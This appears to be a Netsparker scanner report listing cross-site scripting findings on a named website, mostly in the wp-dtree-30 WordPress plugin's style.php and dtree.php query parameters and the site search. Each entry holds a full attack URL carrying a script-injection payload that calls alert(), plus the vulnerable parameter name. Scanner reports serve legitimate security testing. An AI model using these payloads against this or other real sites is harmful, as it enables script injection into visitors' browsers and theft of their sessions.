- * [Possible] Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize='"--></style></script><script>alert(0x000154)</script>&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: fontsize
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000154)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf='"--></style></script><script>alert(0x000182)</script>&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: fontf
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000182)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor='"--></style></script><script>alert(0x0001B2)</script>&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: sfontdecor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0001B2)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor='"--></style></script><script>alert(0x000208)</script>&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: mfontcolor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000208)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor='"--></style></script><script>alert(0x000257)</script>&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: lfontcolor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000257)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor='"--></style></script><script>alert(0x000288)</script>&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: lfontdecor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000288)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor='"--></style></script><script>alert(0x0002B4)</script>&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: hfontcolor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0002B4)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor='"--></style></script><script>alert(0x0002D1)</script>&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: hfontdecor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0002D1)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx='"--></style></script><script>alert(0x0002F7)</script>&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: rssgfx
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0002F7)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh='"--></style></script><script>alert(0x000317)</script>
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: rssgfxh
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000317)</script>
- * Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree.php?witheff=1&eff=blind&effdur='"--></style></script><script>alert(0x0001AA)</script>
- Parameter Name: effdur
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0001AA)</script>
- ...
- http://www.bazen-trebova.cz/?s='"--></style></script><script>alert(0x000248)</script>
- Parameter Name: s
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000248)</script>
- ...
- http://www.bazen-trebova.cz/?"><script>alert(9)</script>
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: "><script>alert(9)</script>
- ...